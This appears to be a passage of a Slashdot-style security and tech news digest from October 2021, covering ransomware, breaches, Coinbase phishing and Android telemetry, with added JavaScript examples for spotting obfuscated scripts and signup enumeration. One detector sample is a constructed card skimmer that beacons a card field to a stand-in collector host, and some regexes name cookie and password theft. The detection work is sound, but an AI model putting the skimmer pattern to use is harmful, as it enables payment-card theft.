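  if (parts.length > 4) return null;
  const nums = [];
  for (const p of parts) {
    const n = parseIPv4Number(p);
    if (n === null) return null; // a non-numeric label such as "example"
    nums.push(n);
  }
  for (let i = 0; i < nums.length - 1; i++) if (nums[i] > 255) return null;
  const last = nums[nums.length - 1];
  if (last >= 256 ** (5 - nums.length)) return null;
  let addr = last;
  for (let i = 0; i < nums.length - 1; i++) addr += nums[i] * 256 ** (3 - i);
  return addr >>> 0;
}

// Classify a hostname the way the new rule does: "domain", "ipv4" or "invalid".
function classifyHost(host) {
  if (!endsInNumber(host)) return "domain";
  return parseIPv4(host) === null ? "invalid" : "ipv4";
}

// Sample hosts (constructed) walked through the classifier.
for (const h of ["example.0.1", "example.com", "192.168.1.1", "127.1", "1.2.3.4.5"]) {
  console.log(h, "->", classifyHost(h));
}
```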

In addition to breaking changes, Chrome 95 also comes with a new UI component called the "Side Panel," which can be used to view the Chrome browser's Reading List and Bookmarks.

Security

Sinclair Broadcast Hack Linked To Notorious Russian Cybergang 22

A weekend cyberattack against Sinclair Broadcast Group was linked to one of the most infamous Russian cybergangs, called Evil Corp, Bloomberg reports. From the report: The Sinclair hackers used malware called Macaw, a variant of ransomware known as WastedLocker. Both Macaw and WastedLocker were created by Evil Corp., according to the two people, who requested anonymity to discuss confidential matters. Evil Corp. was sanctioned by the U.S. Treasury Department in 2019. Since then, it has been accused by cybersecurity experts of rebranding in an attempt to avoid the sanctions. People in the U.S. are generally prohibited from engaging in transactions with sanctioned entities, including paying a ransom. "Sinclair appears to have been hit by Macaw ransomware, a relatively new strain first reported in early October," said Allan Liska, a senior threat analyst at the cybersecurity firm Recorded Future Inc. "There have not been any other Macaw victims publicly reported."

Government

New FCC Rules Could Force Wireless Carriers To Block Spam Texts (engadget.com) 45

An anonymous reader quotes a report from Engadget: Under Acting Chairwoman Jessica Rosenworcel, the Federal Communications Commission is seeking to create new rules targeting spam text messages. Like another recent proposed rulemaking from the agency, the policy would push wireless carriers and telephone companies to block the spam before it ever gets to your phone.

"We've seen a rise in scammers trying to take advantage of our trust of text messages by sending bogus robotexts that try to trick consumers to share sensitive information or click on malicious links," Rosenworcel said. "It's time we take steps to confront this latest wave of fraud and identify how mobile carriers can block these automated messages before they have the opportunity to cause any harm."

Java

About 26% of All Malicious JavaScript Threats Are Obfuscated (bleepingcomputer.com) 18

Akamai researchers have analyzed 10,000 JavaScript samples including malware droppers, phishing pages, scamming tools, Magecart snippets, cryptominers, etc. At least 26% of them use some form of obfuscation to evade detection, indicating an uptick in the adoption of this basic yet effective technique. BleepingComputer reports: Obfuscation is when easy-to-understand source code is converted into hard-to-understand, confusing code that still operates as intended. Threat actors commonly use obfuscation to make it harder to analyze malicious scripts and to bypass security software. Obfuscation can be achieved through various means, like the injection of unused code into a script, the splitting and concatenating of the code (breaking it into unconnected chunks), or the use of hexadecimal patterns and tricky overlaps with function and variable naming.

But not all obfuscation is malicious or tricky. As the report explains, about 0.5% of the 20,000 top-ranking websites on the web (according to Alexa) also use obfuscation techniques. As such, detecting malicious code based on the fact that it is obfuscated isn't enough on its own, and further correlation with malicious functionality needs to be made. This mixing with legitimate deployment is precisely what makes the detection of risky code challenging, and the reason why obfuscation is becoming so widespread in the threat landscape.
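The two-step detection the report calls for (score the obfuscation, then correlate with what the script actually does) as an added JavaScript example; this is not Akamai's tooling, and the indicator thresholds, check names and sample scripts are all constructed for illustration.

```javascript
// Added example, not Akamai's code: score a script on cheap obfuscation
// indicators, then normalize it and look for risky functionality, because
// obfuscation alone also shows up on legitimate sites.

// Indicators that a script was deliberately made hard to read.
const OBFUSCATION_CHECKS = [
  // hex or unicode escapes standing in for plain text: "\x65\x76\x61\x6c"
  { name: "hex-escapes",
    test: (s) => (s.match(/\\x[0-9a-f]{2}|\\u[0-9a-f]{4}/gi) || []).length >= 8 },
  // machine-generated identifiers such as _0x4a1b
  { name: "hex-identifiers",
    test: (s) => (s.match(/\b_0x[0-9a-f]{3,}\b/gi) || []).length >= 3 },
  // strings split into fragments and reassembled: "ev"+"al" or [..].join("")
  { name: "string-splitting",
    test: (s) => /("[^"]{1,3}"\s*\+\s*){2,}"[^"]{1,3}"|\.join\(\s*["']{2}\s*\)/.test(s) },
  // one very long literal, typical of a packed second-stage payload
  { name: "long-literal", test: (s) => /["'][^"'\n]{200,}["']/.test(s) },
];

// Undo the simple tricks so the functionality checks see plain text.
function normalize(src) {
  let out = src
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
  let prev;
  do { // "ab" + "cd"  ->  "abcd", repeated until nothing changes
    prev = out;
    out = out.replace(/"([^"\\]*)"\s*\+\s*"([^"\\]*)"/g, '"$1$2"');
  } while (out !== prev);
  return out;
}

// Functionality worth correlating with: executing code built from text,
// injecting into the DOM, or reading a sensitive value and sending it out.
const RISK_CHECKS = [
  { name: "dynamic-eval",
    test: (s) => /\b(eval|Function)\s*\(|\b(setTimeout|setInterval)\s*\(\s*["']/.test(s) },
  { name: "dom-injection", test: (s) => /document\.write\s*\(|\.innerHTML\s*=/.test(s) },
  { name: "exfil",
    test: (s) => /\b(value|cookie|localStorage|password)\b/.test(s) &&
                 /new\s+Image\b|\.src\s*=|\bfetch\s*\(|XMLHttpRequest|sendBeacon/.test(s) },
];

function analyze(src) {
  const obfuscation = OBFUSCATION_CHECKS.filter((c) => c.test(src)).map((c) => c.name);
  const risk = RISK_CHECKS.filter((c) => c.test(normalize(src))).map((c) => c.name);
  let verdict = "plain";
  if (obfuscation.length && risk.length) verdict = "suspicious";
  else if (obfuscation.length) verdict = "obfuscated-review"; // minifier output looks like this too
  else if (risk.length) verdict = "risky-plain";
  return { obfuscation, risk, verdict };
}

// Constructed samples: a skimmer-style script hiding property names in an
// escaped string table, and a harmless UI script run through the same obfuscator.
const SKIMMER_SAMPLE =
  'var _0x4a1b=["\\x76\\x61\\x6c\\x75\\x65","\\x63\\x63\\x6e\\x75\\x6d","\\x73\\x72\\x63"];' +
  'var _0x2c3d=document.getElementById(_0x4a1b[1])[_0x4a1b[0]];' +
  'var _0x1e2f=new Image();_0x1e2f[_0x4a1b[2]]="https://collector.example/?d="+_0x2c3d;';
const BENIGN_SAMPLE =
  'var _0x12ab=["\\x63\\x6c\\x69\\x63\\x6b","\\x74\\x6f\\x67\\x67\\x6c\\x65"];' +
  'document.querySelectorAll("nav a").forEach(function(_0x3c4d){' +
  '_0x3c4d.addEventListener(_0x12ab[0],function(){_0x3c4d.classList[_0x12ab[1]]("open");});});';
const PLAIN_SAMPLE = 'document.title = "Welcome"; console.log("loaded");';

for (const [label, s] of Object.entries({ SKIMMER_SAMPLE, BENIGN_SAMPLE, PLAIN_SAMPLE })) {
  console.log(label, JSON.stringify(analyze(s)));
}
```

Both obfuscated samples trip the same two indicators; only the normalized skimmer also reads a sensitive field and hands it to an image beacon, which is the correlation that separates them.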

Security

Hacker Steals Government ID Database for Argentina's Entire Population (therecord.media) 41

A hacker has breached the Argentinian government's IT network and stolen ID card details for the country's entire population, data that is now being sold in private circles. The hack, which took place last month, targeted RENAPER, which stands for Registro Nacional de las Personas, translated as National Registry of Persons. From a report: The agency is a crucial cog inside the Argentinian Interior Ministry, where it is tasked with issuing national ID cards to all citizens, data that it also stores in digital format as a database accessible to other government agencies, acting as a backbone for most government queries for citizens' personal information.

Security

Credit Card PINs Can Be Guessed Even When Covering the ATM Pad (bleepingcomputer.com) 58

An anonymous reader quotes a report from BleepingComputer: Researchers have proven it's possible to train a special-purpose deep-learning algorithm that can guess 4-digit card PINs 41% of the time, even if the victim is covering the pad with their hands. The attack requires setting up a replica of the target ATM, because training the algorithm for the specific dimensions and key spacing of the different PIN pads is crucially important. Next, the machine-learning model is trained to recognize pad presses and assign specific probabilities on a set of guesses, using video of people typing PINs on the ATM pad.

For the experiment, the researchers collected 5,800 videos of 58 different people of diverse demographics, entering 4-digit and 5-digit PINs. The machine that ran the prediction model was a Xeon E5-2670 with 128 GB of RAM and three Tesla K20m with 5GB of RAM each. By using three tries, which is typically the maximum allowed number of attempts before the card is withheld, the researchers reconstructed the correct sequence for 5-digit PINs 30% of the time, and reached 41% for 4-digit PINs. The model can exclude keys based on the non-typing hand coverage, and deduces the pressed digits from the movements of the other hand by evaluating the topological distance between two keys. The placement of the camera which captures the tries plays a key role, especially if recording left- or right-handed individuals. Concealing a pinhole camera at the top of the ATM was determined to be the best approach for the attacker. If the camera is capable of capturing audio too, the model could also use pressing sound feedback, which is slightly different for each digit, thus making the predictions a lot more accurate.

Security

US Treasury Says It Tied $5.2 Billion in BTC Transactions To Ransomware Payments (therecord.media) 36

The financial crimes investigation unit of the US Treasury Department, also known as FinCEN, said last week it identified approximately $5.2 billion in outgoing Bitcoin transactions potentially tied to ransomware payments. From a report: FinCEN officials said the figure was compiled by analyzing 2,184 Suspicious Activity Reports (SARs) filed by US financial institutions over the last decade, between January 1, 2011, and June 30, 2021. While the initial SAR reports highlighted $1.56 billion in suspicious activity, a subsequent FinCEN investigation of the Top 10 most common ransomware variants exposed additional transactions, amounting to around $5.2 billion just from these groups alone.

Security

Sinclair TV Stations Disrupted Across the US After Ransomware Attack (therecord.media) 59

TV broadcasts for Sinclair-owned channels went down Sunday across the US in what the stations have described as technical issues, but which multiple sources told The Record was a ransomware attack. From the report: The incident occurred in the early hours of the day and took down the Sinclair internal corporate network, email servers, phone services, and the broadcasting systems of local TV stations. As a result of the attack, many channels weren't able to broadcast morning shows, news segments, and scheduled NFL games, according to a barrage of tweets coming from viewers and the TV channels themselves. "Internally, it's bad," a source who had to call Sinclair employees on their personal numbers to get more details about the attack, told The Record earlier today in a private conversation.

Government

International 'US Cyber Games' Competition Seeks Next Generation of Cybersecurity Experts (washingtonpost.com) 23

"As the United States seeks to shore up its defenses against cyberattacks, the country is seeking to harness the skills of some of the country's most promising young minds," reports the Washington Post, "using a model that mirrors competitive video gaming, also known as esports."

Though it's a partnership between the federal government, academia and the private sector, it's being run by Katzcy, a northern Virginia-based digital marketing firm, the Post reports: U.S. Cyber Games, a project founded in April and funded by the National Institute of Standards and Technology's National Initiative for Cybersecurity Education, has assembled a team of 25 Americans, ages 18 to 26, who will compete against other countries in the inaugural International Cybersecurity Challenge, scheduled to be held in Greece in June 2022.

The cyber games consist of two broad formats, with the competitions organized and promoted to appeal to a generation raised on video gaming. The goal is to identify and train candidates for careers in cybersecurity. There are king-of-the-hill-type games where one team tries to break into a network while the other team tries to defend it. There are also capture-the-flag-type games where teams must complete a series of puzzles that follow the basic tenets of cybersecurity programs, like decrypting an encrypted file or analyzing secret network traffic...

The U.S. cyber team's head coach, retired Lt. Col. TJ O'Connor, who served as a communications support officer with special forces, noted the unique platform presented by cybersecurity competitions. Unlike other forms of computer science education, O'Connor said, staying up to date on the latest developments in cybersecurity is difficult, with hackers constantly iterating on and developing new tactics to break through cyberdefenses. "Understanding the most likely attack is one thing you gain through Cyber Games. It's an attack-based curriculum, and then you can plan the most appropriate strategies when they occur," said O'Connor, who helped create and now chairs Florida Tech's cybersecurity program.

Security

'Dirty Servers': The Untold Story of The Great Twitch Breach of 2014 (vice.com) 8

A 2014 breach at Twitch "was so bad that Twitch essentially had to rebuild much of its code infrastructure because the company eventually decided to assume most of its servers were compromised," reports Vice. "They figured it would be easier to just label them 'dirty,' and slowly migrate them to new servers, according to three former employees who saw and worked with these servers."

Slashdot reader em1ly shares Vice's report (which Vice based on interviews with seven former Twitch employees who'd worked there when the breach happened): The discovery of the suspicious logs kicked off an intense investigation that pulled nearly all Twitch employees on deck. One former employee said they worked 20 hours a day for two months, another said he worked "three weeks straight." Other employees said they worked long hours for weeks on end; some who lived far from the office slept in hotel rooms booked by the company. At the time, Twitch had few, if any, dedicated cybersecurity engineers, so developers and engineers from other teams were pulled into the effort, working together in meeting rooms with glass windows covered, frantically trying to figure out just how bad the hack was, according to five former Twitch employees who were at the company at the time...

Twitch's users would only find out about the breach six months after its discovery, on March 23, 2015, when the company published a short blog post that explained "there may have been unauthorized access to some Twitch user account information," but did not let on nearly how damaging the hack was to Twitch internally.... When Twitch finally disclosed the hack in March of 2015, security engineers at Twitch and Amazon, who had come to help with the incident response, concluded that the hack had started at least eight months before the discovery in October of 2014, though they had no idea if the hackers had actually broken in even earlier than that, according to the former employee. "That was long enough for them to learn entirely how our whole system worked and the attacks they launched demonstrated that knowledge," the former employee said...

For months after the discovery and public announcement, several servers and services were internally labeled as "dirty," as a way to tell all developers and engineers to be careful when interacting with them, and to make sure they'd get cleaned up eventually. This meant that they were still live and in use, but engineers had put restrictions on them in the event that they were still compromised, according to three former employees. "The plan apparently was just to rebuild the entire infra[structure] from known-good code and deprecate the old 'dirty' environment. We still, years later, had a split between 'dirty' services (servers or other things that were running when the hack took place) and 'clean' services, which were fired up after," one of the former employees said. "We celebrated office-wide the day we took down the last dirty service!"

Another former employee tells Vice that the breach came as a surprise, even though the company hadn't invested in keeping itself secure. "Security efforts kept getting cancelled or deprioritized with the argument that 'everyone loves Twitch; no one wants to hack us.'" The Twitch engineer who'd first stumbled onto the breach described his reaction to Vice. " 'Oh fuck.' But I remember thinking that there was so much 'I told you so' here."

One former employee added later that a more recent incident just this month "demonstrates that they didn't learn anything from the incident in 2014." But not everyone agrees. Other former employees said that the damage of this new data breach appears to be less severe than the 2014 hack, and that it's likely thanks to Twitch taking security more seriously since then.

IT

Study Discovers Workers Maintained the Same Productivity With Shorter Work Weeks (msn.com) 172

Bloomberg reports: Even as the Covid-19 pandemic forced companies around the world to reimagine the workplace, researchers in Iceland were already conducting two trials of a shorter work week that involved about 2,500 workers — more than 1% of the country's working population. They found that the experiment was an "overwhelming success" — workers were able to work less, get paid the same, while maintaining productivity and improving personal well-being.

The Iceland research has been one of the few large, formal studies on the subject...

[Workers] were helped by their organizations which took concerted steps like introducing formal training programs on time-management to teach them how to reduce their hours while maintaining productivity. The trials also worked because both employees and employers were flexible, willing to experiment and make changes when something didn't work. In some cases, employers had to add a few hours back after cutting them too much...

Participants in the Iceland study reduced their hours by three to five hours per week without losing pay.

Security

US Govt Reveals Three More Ransomware Attacks on Water Treatment Plants This Year (therecord.media) 10

Ransomware gangs have silently hit three US water and wastewater treatment facilities this year, in 2021, the US government said in a joint cybersecurity advisory published today by the FBI, NSA, CISA, and the EPA. From a report: The attacks -- which had been previously unreported -- took place in March, July, and August and hit facilities in Nevada, Maine, and California, respectively. The attacks led to the threat actors encrypting files, and in one case, even corrupting a computer used to control the SCADA industrial equipment deployed inside the treatment plant. The three new incidents were listed as examples of what could happen when water treatment facilities ignore and fail to secure their computer networks.

Security

Acer Confirms It Was Hacked Again As Culprits Flaunt 60GB of Stolen Customer Data (hothardware.com) 15

For at least the second time in 2021, hackers have breached Acer's servers, this time plundering more than 60 gigabytes of data. HotHardware reports: Acer has confirmed that names, addresses, and phone numbers belonging to several million clients have been compromised in the breach, as well as sensitive corporate financial and audit details. If nothing else, this is certainly bad optics for Acer, which earlier this year was on the receiving end of a massive $50 million ransomware campaign. As proof of the data theft, the ransomware gang posted a bunch of stolen files on the REvil website, including financial spreadsheets, bank balances, and bank communications. It was never made clear if this was partially the result of Microsoft Exchange vulnerabilities that had been used before then by Chinese hackers. In any event, now several months later, hacking group Desorden said it has infiltrated Acer's servers in India and swiped data relating to "millions" of customers.

IT

A Newspaper Informed Missouri About a Website Flaw. The Governor Accused it of 'Hacking' (washingtonpost.com) 120

On Thursday, Gov. Michael Parson (R) called a news conference to warn his state's citizens about a nefarious plot against a teachers' database by a reporter from the St. Louis Post-Dispatch. From a report: "Through a multistep process," Parson said with great solemnity, "an individual took the records of at least three educators, decoded the HTML source code and viewed the Social Security number of those specific educators."

[...] The Post-Dispatch report explains what their reporter, Josh Renaud, did to view the Social Security numbers of Missouri teachers on a website run by the state education department. (The website has been taken down; you can view an old version of it at the Internet Archive.) "Though no private information was clearly visible nor searchable on any of the web pages," the Post-Dispatch's report stated, "the newspaper found that teachers' Social Security numbers were contained in the HTML source code of the pages involved." In other words, it seems, a search tool for teacher credentials responded to searches by including a bunch of information, some of which was embedded in the source code of the page but not visible when just reading the page.

Transportation

Boeing Finds New Defect in Ongoing Struggle To Produce Dreamliner 787 (reuters.com) 35

Boeing and U.S. regulators said Thursday that some titanium 787 Dreamliner parts were improperly manufactured over the past three years, the latest in a series of problems to plague the wide-body aircraft. From a report: The quality issue does not affect the immediate safety of flights, the company and the Federal Aviation Administration (FAA) said. Boeing said the parts were provided by Leonardo, which bought the items from Italy-based Manufacturing Processes Specification (MPS). MPS is no longer a supplier to Leonardo, Boeing said.

The parts include fittings that help secure the floor beam in one fuselage section, as well as other fittings, spacers, brackets, and clips within other assemblies. Undelivered aircraft will be reworked as needed, Boeing said, adding that any fleet actions would be determined through its normal review process and confirmed with the FAA. The defect was found as the planemaker grapples with other problems in its 787 that have caused it to cut production and halt deliveries since May.

Android

Apple Argues Against Allowing App Sideloading By Pointing Out Android's Malware Figures (therecord.media) 66

Apple said today that one of the reasons it does not allow app sideloading or the use of third-party app stores on iOS is because of privacy and security reasons, pointing to the fact that Android sees between 15 and 47 times more malware compared to its app ecosystem. The Record reports: Apple says that the reason its iOS devices are locked into the App Store as the only way to install applications is for security reasons, as this allows its security teams to scan applications for malicious content before they reach users. Apple cited statements from multiple sources (DHS, ENISA, Europol, Interpol, NIST, Kaspersky, Wandera, and Norton), all of which had previously warned users against installing apps from outside official app stores, a process known as app sideloading.

Apple's report then goes on to list multiple malware campaigns targeting Android devices where the threat actors asked users to sideload malicious apps hosted on internet sites or third-party app stores. [...] The list includes a host of threats, such as mundane adware, dangerous ransomware, funds-stealing banking trojans, commercial spyware, and even nation-state malware, which Apple said threat actors have spread by exploiting the loophole in Android's app installation process that allows anyone to install apps from anywhere on the internet. Today's 31-page report (PDF) is the second iteration of the same report, with a first version (PDF) being published back in June, shortly after EU authorities announced their investigation.

Security

How Coinbase Phishers Steal One-Time Passwords (krebsonsecurity.com) 9

An anonymous reader quotes a report from Krebs on Security: A recent phishing campaign targeting Coinbase users shows thieves are getting smarter about phishing one-time passwords (OTPs) needed to complete the login process. It also shows that phishers are attempting to sign up for new Coinbase accounts by the millions as part of an effort to identify email addresses that are already associated with active accounts. Coinbase is the world's second-largest cryptocurrency exchange, with roughly 68 million users from over 100 countries. The now-defunct phishing domain at issue -- coinbase.com.password-reset[.]com -- was targeting Italian Coinbase users (the site's default language was Italian). And it was fairly successful, according to Alex Holden, founder of Milwaukee-based cybersecurity firm Hold Security.

Holden's team managed to peer inside some poorly hidden file directories associated with that phishing site, including its administration page. That panel, pictured in the redacted screenshot below, indicated the phishing attacks netted at least 870 sets of credentials before the site was taken offline. Holden said each time a new victim submitted credentials at the Coinbase phishing site, the administrative panel would make a loud "ding" -- presumably to alert whoever was at the keyboard on the other end of this phishing scam that they had a live one on the hook. In each case, the phishers would manually push a button that caused the phishing site to ask visitors for more information, such as the one-time password from their mobile app. "These guys have real-time capabilities of soliciting any input from the victim they need to get into their Coinbase account," Holden said. Pressing the "Send Info" button prompted visitors to supply additional personal information, including their name, date of birth, and street address. Armed with the target's mobile number, they could also click "Send verification SMS" with a text message prompting them to text back a one-time code.

Holden said the phishing group appears to have identified Italian Coinbase users by attempting to sign up new accounts under the email addresses of more than 2.5 million Italians. His team also managed to recover the username and password data that victims submitted to the site, and virtually all of the submitted email addresses ended in ".it." But the phishers in this case likely weren't interested in registering any accounts. Rather, the bad guys understood that any attempts to sign up using an email address tied to an existing Coinbase account would fail. After doing that several million times, the phishers would then take the email addresses that failed new account signups and target them with Coinbase-themed phishing emails. Holden's data shows this phishing gang conducted hundreds of thousands of halfhearted account signup attempts daily. For example, on Oct. 10 the scammers checked more than 216,000 email addresses against Coinbase's systems. The following day, they attempted to register 174,000 new Coinbase accounts.
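The signup-based account enumeration described above leaves a distinctive trace on the service side: one source submitting a stream of distinct addresses it never comes back to verify. The following is an added JavaScript example, not Coinbase's or Hold Security's code, that flags that pattern in signup logs and shows the response shape that removes the signal; the log format, field names, thresholds and sample lines are all constructed.

```javascript
// Added example (not from the article): detect mass signup probing in a
// signup log, grouped per source per day, and contrast a leaky signup reply
// with a uniform one. Everything below is constructed for illustration.

// Constructed log format: "<ISO time> signup src=<client> email=<addr> result=<code>"
// where result is "created" (new, unverified account) or "exists".
const SAMPLE_LOG = [
  "2021-10-10T09:00:01Z signup src=203.0.113.5 email=anna@example.it result=exists",
  "2021-10-10T09:00:01Z signup src=203.0.113.5 email=bruno@example.it result=created",
  "2021-10-10T09:00:02Z signup src=203.0.113.5 email=carla@example.it result=exists",
  "2021-10-10T09:00:02Z signup src=203.0.113.5 email=dario@example.it result=created",
  "2021-10-10T09:00:03Z signup src=203.0.113.5 email=elena@example.it result=exists",
  "2021-10-10T09:00:03Z signup src=203.0.113.5 email=fabio@example.it result=created",
  "2021-10-10T09:00:04Z signup src=203.0.113.5 email=giulia@example.it result=exists",
  "2021-10-10T10:15:40Z signup src=198.51.100.9 email=dave@example.com result=created",
  "2021-10-10T10:16:02Z signup src=198.51.100.9 email=dave@example.com result=exists", // retry
  "2021-10-11T08:30:00Z signup src=192.0.2.77 email=lisa@example.org result=created",
];

function parseLine(line) {
  const m = line.match(/^(\S+) signup src=(\S+) email=(\S+) result=(\S+)$/);
  if (!m) return null; // unrelated or malformed line
  return { day: m[1].slice(0, 10), src: m[2], email: m[3].toLowerCase(), result: m[4] };
}

// A real user retries the same address; a probe never repeats one. Alert when
// a source tries at least minAttempts addresses and every attempt is a new one.
// Grouping by src alone is a simplification; a fleet of sources needs grouping
// by network block or signup fingerprint as well.
function detectEnumeration(lines, { minAttempts = 5 } = {}) {
  const buckets = new Map();
  for (const line of lines) {
    const e = parseLine(line);
    if (!e) continue;
    const key = `${e.day} ${e.src}`;
    const b = buckets.get(key) ||
      { day: e.day, src: e.src, attempts: 0, existing: 0, emails: new Set() };
    b.attempts += 1;
    if (e.result === "exists") b.existing += 1;
    b.emails.add(e.email);
    buckets.set(key, b);
  }
  const alerts = [];
  for (const b of buckets.values()) {
    if (b.attempts >= minAttempts && b.emails.size === b.attempts) {
      alerts.push({ day: b.day, src: b.src, attempts: b.attempts,
                    distinctEmails: b.emails.size, existing: b.existing });
    }
  }
  return alerts;
}

// The oracle the phishers relied on: the reply itself says whether the
// address already has an account.
function leakySignup(isRegistered) {
  return isRegistered
    ? { status: 409, body: "That email address is already registered." }
    : { status: 201, body: "Account created; check your inbox to verify." };
}

// Uniform reply: the client learns nothing, and the distinction moves to the
// mailbox the requester must already control (a notice vs. a verification link).
function uniformSignup(isRegistered) {
  return {
    response: { status: 202, body: "If this address can be registered, we have emailed it." },
    mail: isRegistered ? "already-registered-notice" : "verification-link",
  };
}

console.log(JSON.stringify(detectEnumeration(SAMPLE_LOG)));
```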

Security

Some of Verizon's Visible Cell Network Customers Say They've Been Hacked (theverge.com) 3

Verizon's Visible network has confirmed that some accounts were accessed without authorization. Visible is a cell service owned and operated by Verizon that "pitches itself as a less expensive, 'all-digital' network, meaning there aren't any physical stores like you'd get with a traditional carrier," notes The Verge. From the report: Starting on Monday, customers on both Twitter and Reddit reported en masse that they'd been getting emails from the company about changed passwords and addresses, and that they've had difficulties contacting the company's chat support. Visible's customer service account on Twitter seemingly hasn't addressed the issue, besides directing upset customers to its DMs. A user marked as a Visible employee on the subreddit posted a statement on Monday afternoon, saying that a "small number" of accounts were affected, but that the company didn't believe its systems had been breached. The statement did recommend that users change their passwords, but as many commenters pointed out (and as I can confirm), the password reset system currently isn't working. In a follow-up article, The Verge reports that Visible has confirmed customer reports of attackers accessing and changing user accounts. The company said that the breaches were carried out using usernames and passwords from "outside sources," adding that it's worked to "mitigate the issue" since it became aware of it. They're recommending you reset your password if it's one you've used for other services.

IT

Activision Unveils Ricochet Anti-cheat System for Call of Duty (venturebeat.com) 32

Activision unveiled its Ricochet anti-cheat system for Call of Duty games as it tries to attack a longstanding cheating problem that has frustrated a lot of players. From a report: The new system will get rid of players cheating in Call of Duty: Warzone later this year and it will debut with Call of Duty: Vanguard, the new premium game coming on multiple platforms on November 5. Activision, whose parent company Activision Blizzard has been sued for having an alleged toxic culture of its own, said in its announcement that cheating in Call of Duty is frustrating for players, developers, and the entire community. The anti-cheat team has made great strides in fighting this persistent issue that affects so many, but the company said it knows more must be done. Ricochet is supported by a team of dedicated professionals focused on fighting unfair play.

The Ricochet anti-cheat initiative is a multi-faceted approach to combat cheating, featuring new server-side tools which monitor analytics to identify cheating, enhanced investigation processes to stamp out cheaters, updates to strengthen account security, and more. Ricochet's backend anti-cheat security features will launch alongside Call of Duty: Vanguard, and later this year with the Pacific update coming to Call of Duty: Warzone. In addition to server enhancements coming with Ricochet is a new PC kernel-level driver, developed internally for the Call of Duty franchise, and launching first for Call of Duty: Warzone. This driver will assist in the identification of cheaters, reinforcing and strengthening the overall server security. The kernel-level driver launches alongside the Pacific update for Warzone later this year.
Further reading: Cheat Maker Is Not Afraid of Call of Duty's New Kernel-Level Anti-Cheat.

Windows

Windows 11's First Update Makes AMD CPU Performance Even Worse (theverge.com) 50

AMD warned last week that its chips are experiencing performance issues in Windows 11, and now Microsoft's first update to its new OS has reportedly made the problems worse. From a report: TechPowerUp reports that it's seeing much higher latency, which means worse performance, after the Windows 11 update went live yesterday. AMD and Microsoft found two issues with Windows 11 on Ryzen processors. Windows 11 can cause L3 cache latency to triple, slowing performance by up to 15 percent in certain games. The second issue affects AMD's preferred core technology, which shifts threads over to the fastest core on a processor. AMD says this second bug could impact performance on CPU-reliant tasks. TechPowerUp measured the L3 cache latency on its Ryzen 7 2700X at around 10ns, and Windows 11 increased this to 17ns. "This was made much worse with the October 12 'Patch Tuesday' update, driving up the latency to 31.9ns," says TechPowerUp. That's a huge jump, and the exact type of issue AMD warned about.

Android

Study Reveals Android Phones Constantly Snoop On Their Users (bleepingcomputer.com) 113

A new study (PDF) by a team of university researchers in the UK has unveiled a host of privacy issues that arise from using Android smartphones. BleepingComputer reports: The researchers have focused on Samsung, Xiaomi, Realme, and Huawei Android devices, and LineageOS and /e/OS, two forks of Android that aim to offer long-term support and a de-Googled experience. The conclusion of the study is worrying for the vast majority of Android users: "With the notable exception of /e/OS, even when minimally configured and the handset is idle these vendor-customized Android variants transmit substantial amounts of information to the OS developer and also to third parties (Google, Microsoft, LinkedIn, Facebook, etc.) that have pre-installed system apps." As the summary table indicates, sensitive user data like persistent identifiers, app usage details, and telemetry information are not only shared with the device vendors, but also go to various third parties, such as Microsoft, LinkedIn, and Facebook. And to make matters worse, Google appears at the receiving end of all collected data almost across the entire table.

It is important to note that this concerns the collection of data for which there's no option to opt out, so Android users are powerless against this type of telemetry. This is particularly concerning when smartphone vendors include third-party apps that are silently collecting data even if they're not used by the device owner, and which cannot be uninstalled. For some of the built-in system apps like miui.analytics (Xiaomi), Heytap (Realme), and Hicloud (Huawei), the researchers found that the encrypted data can sometimes be decoded, putting the data at risk from man-in-the-middle (MitM) attacks. As the study points out, even if the user resets the advertising identifiers for their Google Account on Android, the data-collection system can trivially re-link the new ID back to the same device and append it to the original tracking history. The deanonymization of users takes place using various methods, such as looking at the SIM, IMEI, location data history, IP address, network SSID, or a combination of these.

In response to the report, a Google spokesperson said: "While we appreciate the work of the researchers, we disagree that this behavior is unexpected -- this is how modern smartphones work. As explained in our Google Play Services Help Center article, this data is essential for core device services such as push notifications and software updates across a diverse ecosystem of devices and software builds. For example, Google Play services uses data on certified Android devices to support core device features. Collection of limited basic information, such as a device's IMEI, is necessary to deliver critical updates reliably across Android devices and apps."

Security

Woman Allegedly Hacked Flight School, Cleared Planes With Maintenance Issues To Fly (vice.com) 67

A woman allegedly hacked into the systems of a flight training school in Florida to delete and tamper with information related to the school's airplanes. In some cases, planes that previously had maintenance issues had been "cleared" to fly, according to a police report. The hack, according to the school's CEO, could have put pilots in danger. From a report: Lauren Lide, a 26-year-old who used to work for the Melbourne Flight Training school, resigned from her position of Flight Operations Manager at the end of November of 2019, after the company fired her father. Months later, she allegedly hacked into the systems of her former company, deleting and changing records, in an apparent attempt to get back at her former employer, according to court records obtained by Motherboard. The news of her arrest was first reported by local TV station News Channel 8.

Derek Fallon, the CEO of Melbourne Flight Training, called the police on January 17, 2020, and reported that five days before, he had logged onto his account for Flight Circle, an app his company uses to manage and keep track of its airplanes, and found that information was missing. Fallon found that records related to planes with maintenance issues and reminders of inspections had all been deleted, "meaning aircraft which may have been unsafe to fly were purposely made 'airworthy,'" according to a document written by a Melbourne Airport Police officer.

IT

Coinbase is Launching a Marketplace for NFTs (cnbc.com) 18

Coinbase is getting into NFTs. The cryptocurrency exchange said Tuesday it plans to launch a marketplace that lets users mint, collect and trade NFTs, or non-fungible tokens. From a report: Users can sign up to a waitlist for early access to the feature, the company said. NFTs are one-of-a-kind digital assets designed to represent ownership of online items like rare art or collectible trading cards. They aren't fungible, meaning you can't exchange one NFT for another like you could with bitcoin and other cryptocurrencies. Sales of such tokens have boomed this year. The NFT market topped $10 billion in transaction volume in the third quarter of 2021, according to DappRadar, a company that tracks data on crypto-based applications.

Security

Olympus Confirms US Cyberattack, Weeks After BlackMatter Ransomware Hit EMEA Systems (techcrunch.com) 12

Japanese technology giant Olympus has confirmed it was hit by a cyberattack over the weekend that forced it to shut down its IT systems in the U.S., Canada and Latin America. From a report: In a statement on its website, Olympus said it is "investigating a potential cybersecurity incident detected October 10" and is "currently working with the highest priority to resolve this issue."

